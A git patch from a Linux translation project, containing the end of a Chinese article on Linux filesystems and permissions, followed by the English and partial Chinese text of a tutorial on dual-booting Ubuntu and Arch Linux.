-└ Videos
-
-E:\ [USB thumb drive]
-
-└ Transfer
-```
-
-而一个典型的 Linux 系统却是这样:
-
-```
-/ (the top most directory, called the root directory) [Hard drive]
-
-├ bin
-
-├ etc
-
-├ lib
-
-├ sbin
-
-├ usr
-
-├
-
-└ media
-
- └
-
- ├ cdrom [CD-ROM]
-
- │ ├ Books
-
- │ └ Videos
-
- └ Kingme_USB [USB thumb drive]
-
- └ Transfer
-```
-
-如果你使用一个图形化环境,通常,Linux 中的文件管理器将出现看起来像驱动器的图标的 CD-ROM 和 USB 便携式驱动器,因此,你根本就无需知道介质所在的目录。
-
-### 文件系统
-
-Linux 称这些东西为文件系统。一个文件系统是在介质(比如,硬盘)上保持跟踪所有的文件和目录的一组结构。如果没有文件系统,我们存储在硬盘上的信息就会混乱,我们就不知道哪个块属于哪个文件。你可能听到过一些名字,比如,Ext4、XFS、和 Btrfs。这些都是 Linux 文件系统。
-
-每个保存有文件和目录的介质都有一个文件系统在上面。不同的介质类型可能使用了为它优化过的特定的文件系统。比如,CD-ROMs 使用 ISO9660 或者 UDF 文件系统类型。USB 便携式驱动器一般使用 FAT32,以便于它们可以很容易去与其它计算机系统共享。
-
-Windows 也使用文件系统。不过,我们不过多的讨论它。例如,当你插入一个 CD-ROM,Windows 将读取 ISO9660 文件系统结构,分配一个盘符给它,然后,在盘符(比如,D:\)下显示文件和目录。当然,如果你深究细节,从技术角度说,Windows 是分配一个盘符给一个文件系统,而不是整个驱动器。
-
-使用同样的例子,Linux 也读取 ISO9660 文件系统结构,但它不分配盘符,它附加文件系统到一个目录(这个过程被称为加载)。Linux 将随后在附加的目录(比如是, _/media//cdrom_ )下显示 CD-ROM 上的文件和目录。
-
-因此,在 Linux 上回答 “我的 C:\ 在哪里?” 这个问题,答案是,这里没有 C:\,它们工作方式不一样。
-
-### 文件
-
-Windows 在它的文件系统中存在文件和目录(也被称为文件夹)。但是,Linux 也让你将其它的东西放到文件系统中。这些其它类型的东西是文件系统的原生的对象,并且,它们和普通文件实际上是不同的。除普通文件和目录之外,Linux 还允许你去创建和使用硬链接、符号链接、命名管道、设备节点、和套接字。在这里,我们不展开讨论所有的文件系统对象的类型,但是,这里有几种经常使用到的。
-
-硬链接是用于为文件创建一个或者多个别名。指向磁盘上同样内容的每个别名的名字是不同的。如果在一个文件名下编辑文件,这个改变也同时出现在其它的文件名上。例如,你有一个 _MyResume_2017.doc_,它还一个被称为 _JaneDoeResume.doc_ 的硬链接。(注意,硬链接是从命令行下,使用 _ln_ 的命令去创建的)。你可以找到并编辑 _MyResume_2017.doc_,然后,然后找到 _JaneDoeResume.doc_,你发现它保持了跟踪 -- 它包含了你所有的更新。
-
-符号链接有点像 Windows 中的快捷方式。文件系统的入口包含一个到其它文件或者目录的路径。在很多方面,它们的工作方式和硬链接很相似,它们可以创建一个到其它文件的别名。但是,符号链接也可以像文件一样给目录创建一个别名,并且,符号链接可以指向到不同介质上的不同文件系统,而硬链接做不到这些。(注意,你可以使用带 _-s_ 选项的 _ln_ 命令去创建一个符号链接)
-
-### 权限
-
-另一个很大的区别是文件系统对象上在 Windows 和 Linux 之中涉及的权限(文件、目录、及其它)。Windows 在文件和目录上实现了一套非常复杂的权限。例如,用户和用户组可以有权限去读取、写入、运行、修改、等等。用户和用户组可以授权访问除例外以外的目录中的所有内容,也可以不允许访问除例外的目录中的所有内容。
-
-然而,大多数使用 Windows 的人并不去使用一个特定的权限;因此,当他们发现使用一套权限并且在 Linux 上是强制执行的,他们感到非常惊讶!Linux 通过使用 SELinux 或者 AppArmor 可以强制执行一套更复杂的权限。但是,大多数 Linux 安装版都使用了内置的默认权限。
-
-在默认的权限中,文件系统中的每个条目都有一套为它的文件所有者、文件所在的组、和其它人的权限。这些权限允许他们:读取、写入、和运行。给它们的权限有一个层次。首先,它检查这个(登入的)用户是否为该文件所有者和它拥有的权限。如果不是,然后检查这个用户是否在文件所在的组中和它拥有的权限。如果不是,然后它再检查其它人拥有的权限。这里设置了其它人的权限。但是,这里设置的三套权限大多数情况下都会使用其中的一套。
-
-如果你使用命令行,你输入 `ls -l`,你可以看到如下所表示的权限:
-
-```
-rwxrw-r-- 1 stan dndgrp 25 Oct 33rd 25:01 rolldice.sh
-```
-
-最前面的字母,`rwxrw-r--`,展示了权限。在这个例子中,所有者(stan)可以读取、写入、和运行这个文件(前面的三个字母,rwx);dndgrp 组的成员可以读取和写入这个文件,但是不能运行(第二组的三个字母,rw-);其它人仅可以读取这个文件(最后的三个字母,r--)。
-
-(注意,在 Windows 中去生成一个可运行的脚本,你生成的文件有一个特定的扩展名,比如 .bat,而在 Linux 中,扩展名在操作系统中没有任何意义。而是需要去设置这个文件可运行的权限)
-
-如果你收到一个 _permission denied_ 错误,可能是你去尝试运行了一个要求管理员权限的程序或者命令,或者你去尝试访问一个你的帐户没有访问权限的文件。如果你尝试去做一些要求管理员权限的事,你必须切换登入到一个被称为 _root_ 的用户帐户。或者通过使用一个命令行的被称为 _sudo_ 的助理程序。它可以临时允许你以 _root_ 权限运行。当然,_sudo_ 工具,也会要求你输入密码,以确保你真的有权限。
-
-### 硬盘文件系统
-
-Windows 主要使用一个被称为 `NTFS` 的硬盘文件系统。在 Linux 上,你也可以选一个你希望去使用的硬盘文件系统。不同的文件系统类型呈现不同的特性和不同的性能特征。主要的原生 Linux 的文件系统,现在使用的是 Ext4。但是,在安装 Linux 的时候,你可以有丰富的文件系统类型可供选择,比如,Ext3(Ext4 的前任)、XFS、Btrfs、UBIFS(用于嵌入式系统)、等等。如果你不确定要使用哪一个,Ext4 是一个很好的选择。
-
- _通过来自 Linux 基金会和 edX 的 ["Linux 介绍"][2] 上免费学习更多的 Linux 课程。_
-
---------------------------------------------------------------------------------
-
-via: https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
-
-作者:[JOHN BONESIO][a]
-译者:[qhwdw](https://github.com/qhwdw)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linux.com/users/johnbonesio
-[1]:https://www.linux.com/licenses/category/creative-commons-zero
-[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
-[3]:https://www.linux.com/files/images/butterflies-8075511920jpg
-[4]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
From 6110544572d954ffd548f4ae58b78e4e6c3f107d Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Sun, 7 Jan 2018 17:07:06 +0800
Subject: [PATCH 138/371] Translated by stevenzdg988
---
...0171228 Dual Boot Ubuntu And Arch Linux.md | 369 ------------------
...0171228 Dual Boot Ubuntu And Arch Linux.md | 299 ++++++++++++++
2 files changed, 299 insertions(+), 369 deletions(-)
delete mode 100644 sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
create mode 100644 translated/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
diff --git a/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md b/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
deleted file mode 100644
index adff25c6b6..0000000000
--- a/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
+++ /dev/null
@@ -1,369 +0,0 @@
-Translating by stevenzdg988
-
-Dual Boot Ubuntu And Arch Linux
-======
-![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dual-boot-ubuntu-and-arch-linux_orig.jpg)
-
-**Dual booting Ubuntu and Arch Linux** is not as easy as it sounds, however, I’ll make the process as easy as possible with much clarity. First, we will need to install Ubuntu then Arch Linux since it's much easier configuring the Ubuntu grub to be able to **dual boot Ubuntu and Arch Linux**
-
-### Dual Boot Ubuntu And Arch Linux
-
-Some of the things you will need:
-
-1. Ubuntu flavor of your choice, in this case, I’ll use ubuntu 17.10 iso
-
-2. 2 USB sticks
-
-3. Windows PC or Linux based PC
-
-4. Arch Linux iso
-
-5. Rufus(for windows) or etcher(for Linux distro)
-
-### Install Ubuntu 16.10
-
-First, [create a bootable flash drive][1] using Rufus for both Ubuntu and Arch Linux. Alternatively, you could use etcher to create bootable flash drives for both Ubuntu and Arch Linux.
-
- [![bootable ubuntu usb etcher image writer](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg)][2]
-
-Select the ISO image file for Ubuntu then select the flash drive of your choice after which click flash to create the bootable flash drive. Wait till it completes and Voila! Your bootable flash drive is ready for use.
-
- [![make ubuntu usb bootable in linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg)][3]
-
-Turn on your machine and boot using the bootable flash drive with the Ubuntu installation media. Ensure that you boot into UEFI or BIOS compatibility mode depending on the type of PC you are using. I prefer using UEFI for a newer PC builds.
-
- [![live ubuntu boot](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg)][4]
-
-Upon Successful boot, you will see the following screen asking you to try Ubuntu or install Ubuntu. Choose install Ubuntu.
-
- [![install usb from live usb](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg)][5]
-
-Then check install third-party software for graphics and Wifi hardware, MP3 and other media. Optionally if you have an internet connection choose download updates while installing Ubuntu since it will save time setting up the installation as well as ensure you get the latest updates of your installation.
-
- [![custom partition hd install ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg)][6]
-
-Then choose ‘Something else’ so that we can partition the hard disk and set aside space for swap, Ubuntu, and Archlinux.
-
- [![create swap partition ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg)][7]
-
-Create a swap area partition. Preferably half the size of the ram. In my case, I have 1GB of ram thus 512mb of swap area space.
-
- [![install ubuntu root partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg)][8]
-
-Then create a partition with mount point ‘/’. Then click the install now button.
-
- [![select ubuntu timezone](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg)][9]
-
-Choose your location then choose language and keyboard settings.
-
- [![select ubuntu keyboard layout](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg)][10]
-
-Then create the user credentials that will create a new user.
-
- [![create username, system name ubuntu install](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg)][11]
-
-The installation will now start by clicking next.
-
- [![ubuntu installation finishing](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg)][12]
-
-When the installation is done click on restart PC.
-
- [![ubuntu installation finished restart system](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg)][13]
-
-Remove the installation media and press enter when done.
-
- [![remove installation media after ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg)][14]
-
-Upon confirmation of successful installation, restart and boot into the Arch Linux installation media.
-
-### Install Arch Linux
-
-Upon booting into the
-
-**Arch Linux installation media**
-
-you should see an initial screen as follows. Choose Boot Arch Linux(x86_64). Note Arch Linux is a more of
-
-[DYF][15]
-
-(do it yourself) kind of Operating system.
-
- [![arch linux installation boot menu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg)][16]
-
-After choosing, it will open a tty1 terminal that you will use to install the operating system.
-
- [![arch linux tty1 linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png)][17] Note: You will need an internet connection to download some packages in order to install Arch Linux successfully. So we need to check if the internet is working fine. Enter the following into the terminal to check internet connectivity.
-
-ping linuxandubuntu.com -c 4
-
- [![arch linux ping check internet connection](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png)][18]
-
-If the internet is working fine you should get an echo back showing the number of packets sent and received. In this case, we sent 4 echos and got 4 back meaning the connection is good.
-
-If you want to setup Wifi in Arch Linux, read this post
-
-[here][19]
-
-on setting up Wifi in Arch Linux.
-
-Next, we need to select the partition that’s free that we had earlier set aside while installing Ubuntu.
-
-fdisk -l
-
-The above should show you the available disks that are there. You should see the Ubuntu partitions as well as the free space. We will use cfdisk to partition.
-
-cfdisk
-
- [![install arch partition disk with cfdisk](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png)][20]
-
-You will see the partitions. Select the free space that is below the other allocated partitions.
-
-You will need to select new and then enter the partition size for the partition.
-
- [![partition free space swap arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png)][21] Use for example 9.3G - G representing gigabytes. [![install arch linux partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png)][22]
-
-Make the partition primary as below.
-
- [![make arch linux root as primary partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png)][23] Then choose the write partition entry. [![select partition to install arch](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png)][24]
-
-Type ‘yes’ to confirm the writing of the partition.
-
- [![install arch linux confirm create partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png)][25]
-
-Then choose the quit option.
-
- [![quit cfdisk arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png)][26] Then type:
-
-fdisk -l
-
-To confirm the changes
-
- [![confirm partition changes](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png)][27]
-
-Then partition the disk using:
-
-mkfs.ext4 /dev/sda3
-
-Make sure the partition you choose is the last one that we created so that we don’t mess with the Ubuntu partition.
-
- [![complete arch linux installation partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png)][28]
-
-Then mount it to using the following command -
-
-mount /dev/sda3 /mnt
-
- [![mount base partition in arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-base-partition-in-arch-linux.png?1514472693)][29]
-
-Make a home directory using:
-
-mkdir .mnt/home
-
- [![mount home partition arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-home-partition-arch-linux.png?1514472866)][30]
-
-Mount the home folder to the partition using
-
-mount /dev/sda3 /mnt/home
-
- [![make mount home directory](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/make-mount-home-directory.png?1514472960)][31]
-
-Now install the base system of Archlinux using the command:
-
-pacstrap /mnt base
-
-Make sure you have an internet connection.
-
-
-
-It should take a while to download and set it up depending on the internet speed you have.
-
- [![install arch linux base](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/install-arch-linux-base.png?1514473056)][32]
-
-After the step is complete, the Archlinux base installation is completed.
-
-After installing the Arch Linux base, create a fstab file using the command:
-
-genfstab -U /mnt >> /mnt/etc/fstab
-
- [![create fstab in arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/create-fstab-file-in-arch-linux.png?1514473226)][33]
-
-After that you need to verify the fstab file entries using:
-
-cat /mnt/etc/fstab
-
- [![cat fstab file data terminal](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/cat-fstab-file-data-terminal.png?1514473304)][34]
-
-### Configuring Arch Linux: the basic configuration
-
-You will need to configure the following upon installation:
-
-1. The system language and the system locales
-
-2. The system timezones
-
-3. Root user password
-
-4. Set a hostname
-
-Firstly, you will need to switch to the newly installed base by changing root into the system using the command:
-
-arch-chroot /mnt
-
-#### The system Language and the system locale
-
-You will then have to configure the system language. You will have to uncomment en_UTF-8 UTF-8 and the localization you need in /etc/local.gen
-
-Type:
-
-nano /etc/local.gen
-
-Then uncomment the en_UTF-8 UTF-8
-
-Then type:
-
-locale-gen
-
-To generate the localization settings as follows:
-
- [![generate localization arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/generate-localization-arch-linux.png?1514473406)][35] You will need to set the LANG variable in locale.conf accordingly, for example:
-
-nano /etc/locale.conf
-
-Then change to:
-
-LANG=en_US.UTF-8
-
-If you set the keyboard layout, make the changes persistent in vconsole.conf:
-
-nano /etc/vconsole.conf
-
-Then change to:
-
-KEYMAP=us-eng
-
-#### 2\. The system timezones
-
-You will need to set the time zone using
-
-ln -sf /usr/share/zoneinfo/Region/City /etc/localtime
-
-To see the available time zones, you can use the following command in the terminal:
-
-Note region is shown in blue below in the screenshot:
-
-ls /usr/share/zoneinfo
-
- [![setup zonefile in arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-zonefile-in-arch-linux.png?1514473483)][36] [![setup country zonefile](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png)][37] Run hwclock command as follows to generate /etc/adjtime(assumes the hardware clock is set to UTC.):
-
-# hwclock --systohc
-
-#### 3\. Root password
-
-To set a new password for the Arch Linux installation set root password using:
-
-Passwd
-
-Supply a new password and confirm the password to set the root password.
-
- [![setup arch linux root password](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-arch-linux-root-password.png?1514473649)][38]
-
-#### 4\. Set a hostname and configure network
-
-You will need to create the hostname file:
-
-nano /etc/hostname
-
- [![set arch linux hostname](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-hostname.png?1514473741)][39]
-
-Change the name to your username:
-
- [![set arch linux username](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-username.png?1514473822)][40] Then add a matching entry to hosts:
-
-nano /etc/hosts
-
-127.0.0.1 localhost.localdomain localhost
-
-::1 localhost.localdomain localhost
-
-127.0.1.1 LinuxandUbuntu.localdomain LinuxandUbuntu
-
-
-
-You will need to make the network connections persistent thus use:
-
-systemctl enable dhcpd
-
-#### Grub configuration
-
-Then reboot the machine and enter into Ubuntu to configure the grub.
-
-You will type:
-
-reboot
-
- [![reboot system after arch linux installation](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/reboot-system-after-arch-linux-installation.png?1514474180)][41]
-
-The Arch Linux installation still doesn’t appear therefore we need to install it using update-grub in ubuntu.
-
- [![ubuntu grub menu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/ubuntu-grub-menu.png?1514474302)][42] Open a terminal in Ubuntu and type:
-
-sudo update-grub
-
-It should update the grub to include Arch Linux.
-
-### Conclusion
-
-Congratulations you have successfully set up Ubuntu and Arch Linux to dual boot. The Ubuntu installation is easy but the Arch Linux installation is a challenge for new Linux users. I tried making this tutorial as simple as it can be. But if you have any question on the article, let me know in the comment section below. Also share this article with your friends and help them learn Linux.
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxandubuntu.com/home/dual-boot-ubuntu-and-arch-linux
-
-作者:[LinuxAndUbuntu][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.linuxandubuntu.com
-[1]:http://www.linuxandubuntu.com/home/etcher-burn-images-to-sd-card-make-bootable-usb
-[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg
-[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg
-[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg
-[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg
-[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg
-[7]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg
-[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg
-[9]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg
-[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg
-[11]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg
-[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg
-[13]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg
-[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg
-[15]:http://www.linuxandubuntu.com/home/arch-linux-take-your-linux-knowledge-to-next-level-review
-[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg
-[17]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png
-[18]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png
-[19]:http://www.linuxandubuntu.com/home/how-to-setup-a-wifi-in-arch-linux-using-terminal
-[20]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png
-[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png
-[22]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png
-[23]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png
-[24]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png
-[25]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png
-[26]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png
-[27]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png
-[28]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png
-[29]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-base-partition-in-arch-linux.png
-[30]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-home-partition-arch-linux.png
-[31]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/make-mount-home-directory.png
-[32]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/install-arch-linux-base.png
-[33]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/create-fstab-file-in-arch-linux.png
-[34]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/cat-fstab-file-data-terminal.png
-[35]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/generate-localization-arch-linux.png
-[36]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-zonefile-in-arch-linux.png
-[37]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png
-[38]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-arch-linux-root-password.png
-[39]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-hostname.png
-[40]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-username.png
-[41]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/reboot-system-after-arch-linux-installation.png
-[42]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/ubuntu-grub-menu.png
diff --git a/translated/tech/20171228 Dual Boot Ubuntu And Arch Linux.md b/translated/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
new file mode 100644
index 0000000000..dcb5e8afc6
--- /dev/null
+++ b/translated/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
@@ -0,0 +1,299 @@
+Ubuntu 和 Arch Linux 双启动
+======
+![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dual-boot-ubuntu-and-arch-linux_orig.jpg)
+
+**Ubuntu And Arch Linux 双启动** 不像听起来那么容易, 然而,我将使这个过程尽可能地简单明了。首先,我们需要安装 Ubuntu,然后安装 Arch Linux,因为配置 Ubuntu grub更容易实现**Ubuntu 和 Arch Linux 双启动**
+### Ubuntu And Arch Linux 双启动
+
+你需要准备好以下内容:
+
+1、你需要准备你所选择的 Ubuntu 的特色版本,在这个例子中,我将使用 Ubuntu 17.10 ISO
+
+2、两个优盘
+
+3、Windows 或者 Linux 操作系统的 PC 机
+
+4、Arch Linux ISO
+
+5、基于 Windows 的 Rufus 或是基于 Linux 发行版的 etcher 的两款软件中的一种,要根据自己的系统类型来选择哦。
+### 安装 Ubuntu
+
+首先, 利用 `Rufus` 为 Ubuntu 和 Arch Linux[创建可引导的闪存驱动器][1]。另外,也可以使用 `etcher` 创建 Ubuntu 和 Arch Linux 的可引导闪存驱动器。
+
+ [![Ubuntu 可启动 USB 镜像写入工具](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg)][2]
+
+为 Ubuntu 选择 ISO 映像文件,然后选择闪存驱动器,然后单击 `Flash` 创建可引导的闪存驱动器。等到它完成,瞧!你的启动闪存已经准备好使用了。
+ [![make ubuntu usb bootable in linux在 linux 下创建 Ubuntu USB 引导程序](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg)][3]
+
+
+打开你的机器并使用载有 Ubuntu 安装媒体的启动闪存驱动器进行启动。确保引导到 UEFI 或 BIOS 兼容模式,这取决于您所使用的 PC 的类型。我更喜欢使用 UEFI 来构建新的 PC 。
+ [![Ubuntu 自生系统登陆](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg)][4]
+
+在成功启动后,您将看到如上图显示,要求您尝试 Ubuntu 或安装 Ubuntu,选择安装 Ubuntu。
+ [![从自生可启动 USB 安装](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg)][5]
+
+然后检查安装第三方软件的图形和 Wifi 硬件,MP3 和其他媒体。如果你有一个互联网连接,你可以选择在安装 Ubuntu 的时候下载更新,因为它会节省安装时间,并且确保安装的是最新更新。
+ [![自定义磁盘分区安装 Ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg)][6]
+
+然后选择点击`Something else`,这样我们就可以对硬盘进行分区,并预留出 Ubuntu 和 Archlinux 的分区以及他们的交换分区的空间。
+ [![create swap partition ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg)][7]
+
+创建一个交换分区。最好是内存的一半大小。在我的例子中,我有 1 GB 的内存,因此创建一个 512 MB 的交换空间。
+ [![安装 Ubuntu 到根(/)分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg)][8]
+
+然后创建一个带有挂载点`/`的根分区并且点击`Install Now`按钮。
+ [![选择时区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg)][9]
+
+接下来选择语言和键盘设置。
+ [![选择键盘布局](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg)][10]
+
+然后创建新用户的用户凭据。
+ [![创建用户名, 系统名及安装](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg)][11]
+
+点击`Next`开始安装。
+ [![ubuntu installation finishing](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg)][12]
+
+当安装完成后点击`Restart Now`重启 PC。
+ [![完成 Ubtuntu 安装并重启系统](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg)][13]
+
+移除安装媒介,按下回车继续。
+ [![移除安装媒介](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg)][14]
+
+在确认成功安装后,重新启动并利用 Arch Linux 安装媒介引导。
+### 安装 Arch Linux
+
+在引导到 **Arch Linux 安装媒体**时,您应该看到如下所示的初始屏幕。选择 `Boot Arch Linux(x86_64)`。注意 Arch Linux 更多情况下类似于 [DYF][15] (自我定制)的一种操作系统。
+ [![Arch Linux 安装引导菜单](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg)][16]
+
+选择之后,它将打开一个`tty1`终端,您将使用它来安装操作系统。
+ [![tty终端](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png)][17] 注意:为了成功安装 Arch Linux,您需要一个互联网连接来下载一些必须的系统安装包。所以我们需要检查一下互联网是否运行正常。输入以下命令到终端以检查网络连接。
+```ping linuxandubuntu.com -c 4```
+
+ [![检查互联网连接](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png)][18]
+
